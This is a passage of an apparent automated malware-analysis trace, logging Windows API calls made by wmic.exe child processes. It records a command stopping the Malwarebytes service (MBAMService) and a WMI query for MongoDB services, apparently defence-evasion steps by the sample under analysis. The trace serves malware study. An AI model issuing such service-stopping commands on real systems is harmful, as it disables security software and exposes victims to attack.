(Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0305.126] free (_Block=0x97b9a0) [0305.126] CloseHandle (hObject=0x2f8) returned 1 [0305.126] lstrlenW (lpString="GET") returned 3 [0305.126] lstrlenW (lpString="call") returned 4 [0305.126] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0305.126] lstrlenW (lpString="LIST") returned 4 [0305.126] lstrlenW (lpString="call") returned 4 [0305.126] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0305.126] lstrlenW (lpString="SET") returned 3 [0305.126] lstrlenW (lpString="call") returned 4 [0305.126] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0305.126] lstrlenW (lpString="CALL") returned 4 [0305.126] lstrlenW (lpString="call") returned 4 [0305.126] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0305.127] ??0CHString@@QAE@XZ () returned 0x47fbfc [0305.127] GetCurrentThreadId () returned 0xbdc [0305.127] malloc (_Size=0xc) returned 0x97ae28 [0305.127] malloc (_Size=0xc) returned 0x97ae40 [0305.127] malloc (_Size=0xc) returned 0x97aea0 [0305.127] malloc (_Size=0xc) returned 0x97aeb8 [0305.127] malloc (_Size=0xc) returned 0x9799b8 [0305.127] SysStringLen (param_1="\\\\") returned 0x2 [0305.127] SysStringLen (param_1="NQDPDE") returned 0x6 [0305.127] malloc (_Size=0xc) returned 0x97bd78 [0305.127] SysStringLen (param_1="\\\\NQDPDE") returned 0x8 [0305.127] SysStringLen (param_1="\\") returned 0x1 [0305.127] malloc (_Size=0xc) returned 0x97bf40 [0305.127] SysStringLen (param_1="\\\\NQDPDE\\") returned 0x9 [0305.127] SysStringLen (param_1="root\\cimv2") returned 0xa [0305.127] free (_Block=0x97bd78) [0305.127] free (_Block=0x9799b8) [0305.127] free (_Block=0x97aeb8) [0305.128] free (_Block=0x97aea0) [0305.128] free (_Block=0x97ae40) [0305.128] free (_Block=0x97ae28) [0305.128] malloc (_Size=0xc) returned 0x97bd78 [0305.128] malloc (_Size=0xc) returned 0x97beb0 [0305.128] malloc (_Size=0xc) returned 0x97bdc0 [0305.128] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6c48b8, strNetworkResource="\\\\NQDPDE\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xa68564 | out: ppNamespace=0xa68564*=0x720b10) returned 0x0 [0305.141] free (_Block=0x97bdc0) [0305.141] free (_Block=0x97beb0) [0305.141] free (_Block=0x97bd78) [0305.141] CoSetProxyBlanket (pProxy=0x720b10, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0305.141] free (_Block=0x97bf40) [0305.141] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0305.141] ??0CHString@@QAE@XZ () returned 0x47fbf4 [0305.141] GetCurrentThreadId () returned 0xbdc [0305.141] malloc (_Size=0x38) returned 0x97b9a0 [0305.142] malloc (_Size=0x28) returned 0x97b9e0 [0305.142] malloc (_Size=0x28) returned 0x97ba10 [0305.142] malloc (_Size=0x38) returned 0x97ba40 [0305.142] malloc (_Size=0x38) returned 0x97ba80 [0305.142] malloc (_Size=0x24) returned 0x97bac0 [0305.142] malloc (_Size=0xc) returned 0x97aea0 [0305.142] lstrlenA (lpString="") returned 0 [0305.142] malloc (_Size=0x2) returned 0x972788 [0305.142] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa22b74, cbMultiByte=-1, lpWideCharStr=0x972788, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0305.142] free (_Block=0x972788) [0305.142] malloc (_Size=0x38) returned 0x97baf0 [0305.142] malloc (_Size=0x24) returned 0x97bb30 [0305.142] malloc (_Size=0xc) returned 0x97aeb8 [0305.142] free (_Block=0x97aea0) [0305.142] IWbemServices:GetObject (in: This=0x720b10, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x47fbcc*=0x0, ppCallResult=0x0 | out: ppObject=0x47fbcc*=0x7202a8, ppCallResult=0x0) returned 0x0 [0305.212] malloc (_Size=0xc) returned 0x97aea0 [0305.212] IWbemClassObject:GetMethod (in: This=0x7202a8, wszName="stopservice", lFlags=0, ppInSignature=0x47fbe8, ppOutSignature=0x47fbc8 | out: ppInSignature=0x47fbe8*=0x0, ppOutSignature=0x47fbc8*=0x7236e0) returned 0x0 [0305.212] free (_Block=0x97aea0) [0305.212] IUnknown:Release (This=0x7236e0) returned 0x0 [0305.212] IUnknown:Release (This=0x7202a8) returned 0x0 [0305.214] ??0CHString@@QAE@XZ () returned 0x47faac [0305.214] GetCurrentThreadId () returned 0xbdc [0305.214] malloc (_Size=0xc) returned 0x97ae28 [0305.214] lstrlenA (lpString="") returned 0 [0305.214] malloc (_Size=0x2) returned 0x972788 [0305.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa22b74, cbMultiByte=-1, lpWideCharStr=0x972788, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0305.214] free (_Block=0x972788) [0305.214] malloc (_Size=0xc) returned 0x97aea0 [0305.214] lstrlenA (lpString="") returned 0 [0305.214] malloc (_Size=0x2) returned 0x972788 [0305.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa22b74, cbMultiByte=-1, lpWideCharStr=0x972788, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0305.214] free (_Block=0x972788) [0305.214] malloc (_Size=0xc) returned 0x97ae40 [0305.214] free (_Block=0x97aea0) [0305.214] malloc (_Size=0xc) returned 0x97aea0 [0305.214] lstrlenA (lpString="SELECT * FROM ") returned 14 [0305.214] malloc (_Size=0x1e) returned 0x97bb60 [0305.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa24354, cbMultiByte=-1, lpWideCharStr=0x97bb60, cchWideChar=15 | out: lpWideCharStr="SELECT * FROM ") returned 15 [0305.215] free (_Block=0x97bb60) [0305.215] malloc (_Size=0xc) returned 0x9799b8 [0305.215] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0305.215] SysStringLen (param_1="Win32_Service") returned 0xd [0305.215] free (_Block=0x97aea0) [0305.215] malloc (_Size=0xc) returned 0x97aea0 [0305.215] malloc (_Size=0xc) returned 0x97be50 [0305.215] lstrlenA (lpString=" WHERE ") returned 7 [0305.215] malloc (_Size=0x10) returned 0x97bda8 [0305.215] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa237a8, cbMultiByte=-1, lpWideCharStr=0x97bda8, cchWideChar=8 | out: lpWideCharStr=" WHERE ") returned 8 [0305.215] free (_Block=0x97bda8) [0305.215] malloc (_Size=0xc) returned 0x97bfb8 [0305.215] SysStringLen (param_1=" WHERE ") returned 0x7 [0305.215] SysStringLen (param_1="name like '%%MongoDB%%'") returned 0x17 [0305.216] malloc (_Size=0xc) returned 0x97be80 [0305.216] SysStringLen (param_1="SELECT * FROM Win32_Service") returned 0x1b [0305.216] SysStringLen (param_1=" WHERE name like '%%MongoDB%%'") returned 0x1e [0305.216] free (_Block=0x9799b8) [0305.216] free (_Block=0x97bfb8) [0305.216] free (_Block=0x97be50) [0305.216] free (_Block=0x97aea0) [0305.216] malloc (_Size=0xc) returned 0x97bcd0 [0305.216] IWbemServices:ExecQuery (in: This=0x720b10, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_Service WHERE name like '%%MongoDB%%'", lFlags=48, pCtx=0x0, ppEnum=0x47fab8 | out: ppEnum=0x47fab8*=0x7241e8) returned 0x0 [0305.232] free (_Block=0x97bcd0) [0305.232] CoSetProxyBlanket (pProxy=0x7241e8, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0305.252] IEnumWbemClassObject:Next (in: This=0x7241e8, lTimeout=-1, uCount=0x1, apObjects=0x47fab4, puReturned=0x47faa4 | out: apObjects=0x47fab4*=0x0, puReturned=0x47faa4*=0x0) returned 0x1 [0306.294] IUnknown:Release (This=0x7241e8) returned 0x0 [0306.297] free (_Block=0x97be80) [0306.297] free (_Block=0x97ae40) [0306.297] free (_Block=0x97ae28) [0306.297] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0306.297] free (_Block=0x97aeb8) [0306.297] free (_Block=0x97bac0) [0306.297] free (_Block=0x97ba80) [0306.297] free (_Block=0x97ba40) [0306.297] free (_Block=0x97ba10) [0306.297] free (_Block=0x97b9e0) [0306.297] free (_Block=0x97bb30) [0306.297] free (_Block=0x97baf0) [0306.297] free (_Block=0x97b9a0) [0306.297] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0306.297] GetCurrentThreadId () returned 0xbdc [0306.298] ??0CHString@@QAE@PBG@Z () returned 0x47fc6c [0306.298] ??YCHString@@QAEABV0@PBG@Z () returned 0x47fc6c [0306.298] malloc (_Size=0x800) returned 0x97c0a8 [0306.298] LoadStringW (in: hInstance=0x0, uID=0xb3bc, lpBuffer=0x97c0a8, cchBufferMax=1024 | out: lpBuffer="No Instance(s) Available.\r\n") returned 0x1b [0306.298] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0306.298] malloc (_Size=0x1c) returned 0x97b9a0 [0306.298] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x97b9a0, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="No Instance(s) Available.\r\n", lpUsedDefaultChar=0x0) returned 28 [0306.298] __iob_func () returned 0x776f2608 [0306.298] fprintf (in: _File=0x776f2628, _Format="%s" | out: _File=0x776f2628) returned 27 [0306.298] __iob_func () returned 0x776f2608 [0306.298] fflush (in: _File=0x776f2628 | out: _File=0x776f2628) returned 0 [0306.298] free (_Block=0x97b9a0) [0306.298] free (_Block=0x97c0a8) [0306.298] ??1CHString@@QAE@XZ () returned 0x1 [0306.299] WbemLocator:IUnknown:Release (This=0x720b10) returned 0x0 [0306.299] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0306.299] _kbhit () returned 0x0 [0306.303] free (_Block=0x972ee8) [0306.303] free (_Block=0x97acd8) [0306.303] free (_Block=0x97acf0) [0306.303] free (_Block=0x97ac48) [0306.303] free (_Block=0x97ab70) [0306.303] free (_Block=0x97b048) [0306.303] free (_Block=0x97b178) [0306.303] free (_Block=0x979da8) [0306.303] free (_Block=0x97b1f8) [0306.303] free (_Block=0x97ad38) [0306.303] free (_Block=0x972a00) [0306.303] free (_Block=0x970520) [0306.303] free (_Block=0x97bc70) [0306.303] free (_Block=0x97ac78) [0306.303] free (_Block=0x97ae10) [0306.303] free (_Block=0x97bc30) [0306.303] free (_Block=0x97bbf0) [0306.303] free (_Block=0x97aed0) [0306.303] free (_Block=0x97ae58) [0306.303] free (_Block=0x97ae70) [0306.303] free (_Block=0x97bbc0) [0306.303] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0306.303] free (_Block=0x97b0e0) [0306.303] free (_Block=0x97ac60) [0306.303] free (_Block=0x970568) [0306.304] free (_Block=0x97acc0) [0306.304] free (_Block=0x97b1b8) [0306.304] free (_Block=0x97ad08) [0306.304] free (_Block=0x972cc0) [0306.304] free (_Block=0x9726b0) [0306.304] free (_Block=0x9726f8) [0306.304] free (_Block=0x972740) [0306.304] free (_Block=0x97ae88) [0306.304] free (_Block=0x9727c8) [0306.304] free (_Block=0x970508) [0306.304] free (_Block=0x972a60) [0306.304] free (_Block=0x9704f0) [0306.304] free (_Block=0x972ac0) [0306.304] free (_Block=0x9704d8) [0306.304] free (_Block=0x9729c0) [0306.304] free (_Block=0x972908) [0306.304] free (_Block=0x972920) [0306.304] free (_Block=0x9728d0) [0306.304] free (_Block=0x9728e8) [0306.304] free (_Block=0x972940) [0306.304] free (_Block=0x972958) [0306.304] free (_Block=0x9704a0) [0306.304] free (_Block=0x9704b8) [0306.304] free (_Block=0x972860) [0306.304] free (_Block=0x972878) [0306.305] free (_Block=0x972828) [0306.305] free (_Block=0x972840) [0306.305] free (_Block=0x972898) [0306.305] free (_Block=0x9728b0) [0306.305] free (_Block=0x9727f0) [0306.305] free (_Block=0x972808) [0306.305] free (_Block=0x9727a0) [0306.305] free (_Block=0x9711f8) [0306.305] free (_Block=0x97afc0) [0306.305] WbemLocator:IUnknown:Release (This=0x6c48b8) returned 0x2 [0306.305] WbemLocator:IUnknown:Release (This=0x6cab38) returned 0x0 [0306.306] WbemLocator:IUnknown:Release (This=0x6c48b8) returned 0x1 [0306.306] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0306.306] WbemLocator:IUnknown:Release (This=0x6c48b8) returned 0x0 [0306.306] free (_Block=0x97ad20) [0306.306] free (_Block=0x97ac30) [0306.306] free (_Block=0x972a40) [0306.306] free (_Block=0x97ad68) [0306.306] free (_Block=0x97aba0) [0306.306] free (_Block=0x972c60) [0306.306] free (_Block=0x97adb0) [0306.306] free (_Block=0x97abe8) [0306.306] free (_Block=0x9729a0) [0306.306] free (_Block=0x97adc8) [0306.306] free (_Block=0x97ad80) [0306.306] free (_Block=0x972c40) [0306.306] free (_Block=0x97ab88) [0306.307] free (_Block=0x97aca8) [0306.307] free (_Block=0x972ca0) [0306.307] free (_Block=0x97ac00) [0306.307] free (_Block=0x97ab28) [0306.307] free (_Block=0x972ae0) [0306.307] free (_Block=0x97ade0) [0306.307] free (_Block=0x97ac90) [0306.307] free (_Block=0x972d20) [0306.307] free (_Block=0x97adf8) [0306.307] free (_Block=0x97ad50) [0306.307] free (_Block=0x972d60) [0306.307] free (_Block=0x9798b0) [0306.307] free (_Block=0x97abd0) [0306.307] free (_Block=0x972b80) [0306.307] free (_Block=0x97ab40) [0306.307] free (_Block=0x97ad98) [0306.307] free (_Block=0x972c20) [0306.307] free (_Block=0x97abb8) [0306.307] free (_Block=0x97ab58) [0306.307] free (_Block=0x972b00) [0306.307] free (_Block=0x97ac18) [0306.307] free (_Block=0x97ab10) [0306.307] free (_Block=0x972b20) [0306.308] free (_Block=0x979850) [0306.308] free (_Block=0x979958) [0306.308] free (_Block=0x972be0) [0306.308] free (_Block=0x979808) [0306.308] free (_Block=0x9799a0) [0306.308] free (_Block=0x972bc0) [0306.308] free (_Block=0x979820) [0306.308] free (_Block=0x979838) [0306.308] free (_Block=0x972ba0) [0306.308] free (_Block=0x979910) [0306.308] free (_Block=0x9798e0) [0306.308] free (_Block=0x972aa0) [0306.308] free (_Block=0x979868) [0306.308] free (_Block=0x979880) [0306.308] free (_Block=0x972d40) [0306.308] free (_Block=0x979940) [0306.308] free (_Block=0x979970) [0306.308] free (_Block=0x972b60) [0306.308] free (_Block=0x979928) [0306.309] free (_Block=0x979988) [0306.309] free (_Block=0x972c00) [0306.309] free (_Block=0x9798f8) [0306.309] free (_Block=0x9797f0) [0306.309] free (_Block=0x972a80) [0306.309] free (_Block=0x9798c8) [0306.309] free (_Block=0x979898) [0306.309] free (_Block=0x972a20) [0306.309] CoUninitialize () [0306.334] exit (_Code=0) [0306.335] free (_Block=0x97aee8) [0306.335] free (_Block=0x971000) [0306.335] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0306.335] free (_Block=0x972e10) [0306.335] free (_Block=0x9727e0) [0306.335] free (_Block=0x970fe0) [0306.335] free (_Block=0x970fc0) [0306.335] free (_Block=0x970f90) [0306.335] free (_Block=0x970f70) [0306.335] free (_Block=0x970f40) [0306.335] free (_Block=0x970f00) [0306.335] free (_Block=0x970ee0) [0306.335] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0306.335] free (_Block=0x972b40) Thread: id = 304 os_tid = 0x394 Thread: id = 305 os_tid = 0x11e4 Thread: id = 306 os_tid = 0xec0 Thread: id = 307 os_tid = 0x258 Process: id = "29" image_name = "wmic.exe" filename = "c:\\windows\\syswow64\\wbem\\wmic.exe" page_root = "0x5b247000" os_pid = "0xec" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x13b8" cmd_line = "\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%MBAMService%%'\" call stopservice" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 309 os_tid = 0x3e0 [0306.544] GetModuleHandleA (lpModuleName=0x0) returned 0xa20000 [0306.544] __set_app_type (_Type=0x1) [0306.544] __p__fmode () returned 0x776f3c14 [0306.544] __p__commode () returned 0x776f49ec [0306.544] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xa59af0) returned 0x0 [0306.545] __wgetmainargs (in: _Argc=0xa681a8, _Argv=0xa681ac, _Env=0xa681b0, _DoWildCard=0, _StartInfo=0xa681bc | out: _Argc=0xa681a8, _Argv=0xa681ac, _Env=0xa681b0) returned 0 [0306.545] ??0CHString@@QAE@XZ () returned 0xa685ec [0306.545] malloc (_Size=0x18) returned 0x3220ee8 [0306.545] malloc (_Size=0x38) returned 0x3220f08 [0306.545] malloc (_Size=0x28) returned 0x3220f48 [0306.547] malloc (_Size=0x18) returned 0x3220f78 [0306.547] malloc (_Size=0x24) returned 0x3220f98 [0306.547] malloc (_Size=0x18) returned 0x3220fc8 [0306.547] malloc (_Size=0x18) returned 0x3220fe8 [0306.547] ??0CHString@@QAE@XZ () returned 0xa688fc [0306.547] malloc (_Size=0x18) returned 0x3221008 [0306.547] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0306.547] SetConsoleCtrlHandler (HandlerRoutine=0xa53cc0, Add=1) returned 1 [0306.547] _onexit (_Func=0xa5f370) returned 0xa5f370 [0306.547] _onexit (_Func=0xa5f380) returned 0xa5f380 [0306.548] _onexit (_Func=0xa5f390) returned 0xa5f390 [0306.548] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0306.548] ResolveDelayLoadedAPI () returned 0x74a22590 [0306.548] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0306.552] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0306.560] CoCreateInstance (in: rclsid=0xa26a74*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xa26a84*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xa68510 | out: ppv=0xa68510*=0x2f14ba8) returned 0x0 [0306.581] GetCurrentProcess () returned 0xffffffff [0306.581] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x2ecfc90 | out: TokenHandle=0x2ecfc90*=0x194) returned 1 [0306.581] GetTokenInformation (in: TokenHandle=0x194, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x2ecfc8c | out: TokenInformation=0x0, ReturnLength=0x2ecfc8c) returned 0 [0306.581] malloc (_Size=0x118) returned 0x32226b0 [0306.581] GetTokenInformation (in: TokenHandle=0x194, TokenInformationClass=0x3, TokenInformation=0x32226b0, TokenInformationLength=0x118, ReturnLength=0x2ecfc8c | out: TokenInformation=0x32226b0, ReturnLength=0x2ecfc8c) returned 1 [0306.581] AdjustTokenPrivileges (in: TokenHandle=0x194, DisableAllPrivileges=0, NewState=0x32226b0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0306.581] free (_Block=0x32226b0) [0306.581] CloseHandle (hObject=0x194) returned 1 [0306.581] malloc (_Size=0x40) returned 0x32226b0 [0306.581] malloc (_Size=0x40) returned 0x32226f8 [0306.581] malloc (_Size=0x40) returned 0x3222740 [0306.581] SetThreadUILanguage (LangId=0x0) returned 0x2c80409 [0306.584] _vsnwprintf (in: _Buffer=0x3222740, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x2ecfc18 | out: _Buffer="ms_409") returned 6 [0306.584] malloc (_Size=0x20) returned 0x3221200 [0306.585] GetComputerNameW (in: lpBuffer=0x3221200, nSize=0x2ecfc7c | out: lpBuffer="NQDPDE", nSize=0x2ecfc7c) returned 1 [0306.585] lstrlenW (lpString="NQDPDE") returned 6 [0306.585] malloc (_Size=0xe) returned 0x3222788 [0306.585] lstrlenW (lpString="NQDPDE") returned 6 [0306.585] ResolveDelayLoadedAPI () returned 0x7444db00 [0306.585] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x2ecfc90 | out: lpNameBuffer=0x0, nSize=0x2ecfc90) returned 0x2c86000 [0306.586] GetLastError () returned 0xea [0306.586] malloc (_Size=0x1e) returned 0x32227a0 [0306.586] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x32227a0, nSize=0x2ecfc90 | out: lpNameBuffer="NQDPDE\\FD1HVy", nSize=0x2ecfc90) returned 0x1 [0306.587] lstrlenW (lpString="") returned 0 [0306.587] lstrlenW (lpString="NQDPDE") returned 6 [0306.587] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="", cchCount2=0) returned 3 [0306.588] lstrlenW (lpString=".") returned 1 [0306.588] lstrlenW (lpString="NQDPDE") returned 6 [0306.588] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2=".", cchCount2=1) returned 3 [0306.588] lstrlenW (lpString="LOCALHOST") returned 9 [0306.588] lstrlenW (lpString="NQDPDE") returned 6 [0306.588] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="LOCALHOST", cchCount2=9) returned 3 [0306.588] lstrlenW (lpString="NQDPDE") returned 6 [0306.588] lstrlenW (lpString="NQDPDE") returned 6 [0306.588] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="NQDPDE", cchCount2=6) returned 2 [0306.588] free (_Block=0x3222788) [0306.588] lstrlenW (lpString="NQDPDE") returned 6 [0306.588] malloc (_Size=0xe) returned 0x3222788 [0306.588] lstrlenW (lpString="NQDPDE") returned 6 [0306.588] lstrlenW (lpString="NQDPDE") returned 6 [0306.588] malloc (_Size=0xe) returned 0x32227c8 [0306.588] lstrlenW (lpString="NQDPDE") returned 6 [0306.588] malloc (_Size=0x4) returned 0x32227e0 [0306.589] malloc (_Size=0xc) returned 0x32227f0 [0306.589] ResolveDelayLoadedAPI () returned 0x7745b870 [0306.597] malloc (_Size=0x18) returned 0x3222808 [0306.597] malloc (_Size=0xc) returned 0x3222828 [0306.597] SysStringLen (param_1="IDENTIFY") returned 0x8 [0306.597] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0306.597] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0306.597] SysStringLen (param_1="IDENTIFY") returned 0x8 [0306.597] malloc (_Size=0x18) returned 0x3222840 [0306.598] malloc (_Size=0xc) returned 0x3222860 [0306.598] SysStringLen (param_1="IMPERSONATE") returned 0xb [0306.598] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0306.598] SysStringLen (param_1="IMPERSONATE") returned 0xb [0306.598] SysStringLen (param_1="IDENTIFY") returned 0x8 [0306.598] SysStringLen (param_1="IDENTIFY") returned 0x8 [0306.598] SysStringLen (param_1="IMPERSONATE") returned 0xb [0306.598] malloc (_Size=0x18) returned 0x3222878 [0306.598] malloc (_Size=0xc) returned 0x3222898 [0306.598] SysStringLen (param_1="DELEGATE") returned 0x8 [0306.598] SysStringLen (param_1="IDENTIFY") returned 0x8 [0306.598] SysStringLen (param_1="DELEGATE") returned 0x8 [0306.598] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0306.598] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0306.598] SysStringLen (param_1="DELEGATE") returned 0x8 [0306.598] malloc (_Size=0x18) returned 0x32228b0 [0306.598] malloc (_Size=0xc) returned 0x32228d0 [0306.598] malloc (_Size=0x18) returned 0x32228e8 [0306.598] malloc (_Size=0xc) returned 0x3222908 [0306.598] SysStringLen (param_1="NONE") returned 0x4 [0306.598] SysStringLen (param_1="DEFAULT") returned 0x7 [0306.598] SysStringLen (param_1="DEFAULT") returned 0x7 [0306.598] SysStringLen (param_1="NONE") returned 0x4 [0306.598] malloc (_Size=0x18) returned 0x3222920 [0306.598] malloc (_Size=0xc) returned 0x3222940 [0306.598] SysStringLen (param_1="CONNECT") returned 0x7 [0306.598] SysStringLen (param_1="DEFAULT") returned 0x7 [0306.598] malloc (_Size=0x18) returned 0x3222958 [0306.598] malloc (_Size=0xc) returned 0x32204a0 [0306.599] SysStringLen (param_1="CALL") returned 0x4 